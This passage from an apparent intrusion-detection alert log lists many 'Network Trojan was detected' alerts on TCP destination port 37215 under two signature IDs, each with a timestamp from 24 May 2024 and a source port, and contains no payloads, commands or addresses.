              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574422
              SID:2835222
              Source Port:46844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111004
              SID:2829579
              Source Port:56260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799249
              SID:2829579
              Source Port:58786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621830
              SID:2829579
              Source Port:38680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860096
              SID:2829579
              Source Port:46516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270588
              SID:2835222
              Source Port:41424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639455
              SID:2829579
              Source Port:59966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568663
              SID:2835222
              Source Port:50358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725069
              SID:2829579
              Source Port:39492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547243
              SID:2835222
              Source Port:45036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120750
              SID:2835222
              Source Port:60048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481541
              SID:2829579
              Source Port:42830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120763
              SID:2835222
              Source Port:38304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536052
              SID:2835222
              Source Port:41256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484251
              SID:2829579
              Source Port:58042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493173
              SID:2835222
              Source Port:56674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402301
              SID:2829579
              Source Port:39170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411848
              SID:2835222
              Source Port:44234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548486
              SID:2829579
              Source Port:42206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148821
              SID:2829579
              Source Port:37594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551676
              SID:2835222
              Source Port:54710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249681
              SID:2835222
              Source Port:36088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522251
              SID:2829579
              Source Port:37098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.393842
              SID:2829579
              Source Port:56944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.124853
              SID:2835222
              Source Port:42360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123130
              SID:2835222
              Source Port:60588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099853
              SID:2829579
              Source Port:55992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252515
              SID:2835222
              Source Port:50990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433706
              SID:2829579
              Source Port:33258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582671
              SID:2835222
              Source Port:58576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518588
              SID:2835222
              Source Port:59238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879403
              SID:2835222
              Source Port:36556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150636
              SID:2835222
              Source Port:49140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.114114
              SID:2835222
              Source Port:38362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462895
              SID:2835222
              Source Port:58444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188363
              SID:2835222
              Source Port:42200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065779
              SID:2835222
              Source Port:43988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725503
              SID:2829579
              Source Port:52438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157147
              SID:2829579
              Source Port:60756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431498
              SID:2829579
              Source Port:60666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575545
              SID:2829579
              Source Port:55104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989702
              SID:2835222
              Source Port:48952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332378
              SID:2829579
              Source Port:53344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.159811
              SID:2829579
              Source Port:56330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103140
              SID:2829579
              Source Port:36690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435286
              SID:2829579
              Source Port:51570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345274
              SID:2829579
              Source Port:45232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574553
              SID:2835222
              Source Port:38434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490949
              SID:2835222
              Source Port:52974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456430
              SID:2829579
              Source Port:37260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232624
              SID:2835222
              Source Port:46772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493090
              SID:2829579
              Source Port:33124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268487
              SID:2829579
              Source Port:46894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358600
              SID:2835222
              Source Port:49284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572578
              SID:2835222
              Source Port:51650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858403
              SID:2835222
              Source Port:45294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098103
              SID:2829579
              Source Port:44544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421002
              SID:2829579
              Source Port:60608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100606
              SID:2835222
              Source Port:40682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759696
              SID:2829579
              Source Port:58092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205918
              SID:2835222
              Source Port:54258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661870
              SID:2835222
              Source Port:55604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926623
              SID:2829579
              Source Port:41432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535235
              SID:2829579
              Source Port:33946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459788
              SID:2829579
              Source Port:49226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882784
              SID:2835222
              Source Port:51540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430669
              SID:2835222
              Source Port:42500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.776733
              SID:2835222
              Source Port:32780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546117
              SID:2829579
              Source Port:35426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833794
              SID:2835222
              Source Port:41816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116104
              SID:2829579
              Source Port:35120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408058
              SID:2835222
              Source Port:49954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.351127
              SID:2829579
              Source Port:38946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116279
              SID:2829579
              Source Port:38278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482611
              SID:2829579
              Source Port:56256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763331
              SID:2829579
              Source Port:49458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873914
              SID:2835222
              Source Port:41068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113235
              SID:2835222
              Source Port:36840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105524
              SID:2835222
              Source Port:33140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703548
              SID:2829579
              Source Port:57100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448822
              SID:2835222
              Source Port:45188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364385
              SID:2829579
              Source Port:37134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535989
              SID:2835222
              Source Port:50444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625607
              SID:2835222
              Source Port:37386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.603816
              SID:2835222
              Source Port:51652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188646
              SID:2829579
              Source Port:42418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128778
              SID:2829579
              Source Port:38632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799252
              SID:2835222
              Source Port:43594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061914
              SID:2835222
              Source Port:44172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062748
              SID:2829579
              Source Port:46044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341423
              SID:2835222
              Source Port:42144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149005
              SID:2835222
              Source Port:59812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360559
              SID:2829579
              Source Port:38552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156327
              SID:2835222
              Source Port:33254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202977
              SID:2835222
              Source Port:40720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432401
              SID:2835222
              Source Port:45804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.738764
              SID:2829579
              Source Port:59348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467841
              SID:2835222
              Source Port:41932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303388
              SID:2835222
              Source Port:52698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431263
              SID:2835222
              Source Port:48488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196806
              SID:2835222
              Source Port:33570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689850
              SID:2829579
              Source Port:46904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868691
              SID:2829579
              Source Port:59584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268600
              SID:2829579
              Source Port:34728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802984
              SID:2829579
              Source Port:56184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.684924
              SID:2835222
              Source Port:56558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574420
              SID:2835222
              Source Port:42624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.077862
              SID:2835222
              Source Port:48122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341335
              SID:2835222
              Source Port:59152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967472
              SID:2835222
              Source Port:51062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522534
              SID:2829579
              Source Port:33062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368787
              SID:2835222
              Source Port:54688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308732
              SID:2835222
              Source Port:39206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360836
              SID:2829579
              Source Port:44396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482826
              SID:2835222
              Source Port:40628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477171
              SID:2835222
              Source Port:43760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.147092
              SID:2835222
              Source Port:41874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340881
              SID:2835222
              Source Port:53056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551393
              SID:2829579
              Source Port:56612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233905
              SID:2829579
              Source Port:43938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278341
              SID:2829579
              Source Port:50942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.114137
              SID:2829579
              Source Port:39128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920251
              SID:2835222
              Source Port:49184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828648
              SID:2835222
              Source Port:54136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361565
              SID:2829579
              Source Port:53010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400732
              SID:2829579
              Source Port:41476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448740
              SID:2829579
              Source Port:51916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372503
              SID:2835222
              Source Port:50730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406355
              SID:2829579
              Source Port:35356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.124819
              SID:2835222
              Source Port:59332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450166
              SID:2835222
              Source Port:56834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.862020
              SID:2835222
              Source Port:48972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460550
              SID:2829579
              Source Port:43068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545530
              SID:2829579
              Source Port:48964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204421
              SID:2829579
              Source Port:40120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.158791
              SID:2829579
              Source Port:37934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397777
              SID:2829579
              Source Port:40648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057205
              SID:2829579
              Source Port:40038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575757
              SID:2829579
              Source Port:51780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460596
              SID:2829579
              Source Port:34750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506493
              SID:2829579
              Source Port:58800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856763
              SID:2829579
              Source Port:39660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485723
              SID:2835222
              Source Port:40574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663682
              SID:2829579
              Source Port:41692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078228
              SID:2829579
              Source Port:41560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116590
              SID:2829579
              Source Port:59694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625275
              SID:2835222
              Source Port:44500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662624
              SID:2835222
              Source Port:51424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816026
              SID:2829579
              Source Port:52688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400703
              SID:2829579
              Source Port:54306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153159
              SID:2829579
              Source Port:45390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489343
              SID:2835222
              Source Port:42576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.830475
              SID:2835222
              Source Port:44960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726581
              SID:2835222
              Source Port:41294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365361
              SID:2829579
              Source Port:43380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478195
              SID:2835222
              Source Port:38562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520207
              SID:2835222
              Source Port:58058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804594
              SID:2835222
              Source Port:52884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189447
              SID:2829579
              Source Port:43078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857795
              SID:2835222
              Source Port:33962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594760
              SID:2829579
              Source Port:38902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517917
              SID:2829579
              Source Port:55604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377690
              SID:2835222
              Source Port:52446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501464
              SID:2829579
              Source Port:33642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334141
              SID:2835222
              Source Port:40930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516491
              SID:2829579
              Source Port:43874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313272
              SID:2829579
              Source Port:52772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063180
              SID:2829579
              Source Port:45644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208915
              SID:2835222
              Source Port:55074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382946
              SID:2835222
              Source Port:47266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535989
              SID:2829579
              Source Port:55016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474623
              SID:2829579
              Source Port:58188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334210
              SID:2829579
              Source Port:39326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872015
              SID:2835222
              Source Port:39558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186944
              SID:2829579
              Source Port:57702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202799
              SID:2835222
              Source Port:45698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539870
              SID:2829579
              Source Port:60340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970606
              SID:2829579
              Source Port:60912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155074
              SID:2835222
              Source Port:44226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638442
              SID:2835222
              Source Port:43938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396207
              SID:2829579
              Source Port:58772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390569
              SID:2829579
              Source Port:36598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234711
              SID:2835222
              Source Port:50964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100010
              SID:2829579
              Source Port:34246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.125178
              SID:2835222
              Source Port:51872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396700
              SID:2835222
              Source Port:35046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329677
              SID:2829579
              Source Port:51972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103690
              SID:2835222
              Source Port:41730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.826796
              SID:2835222
              Source Port:36858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589127
              SID:2835222
              Source Port:43528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725307
              SID:2835222
              Source Port:38414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503831
              SID:2829579
              Source Port:35294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928638
              SID:2829579
              Source Port:37798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443647
              SID:2829579
              Source Port:53338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693097
              SID:2829579
              Source Port:37714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398418
              SID:2829579
              Source Port:56812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481138
              SID:2835222
              Source Port:38262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
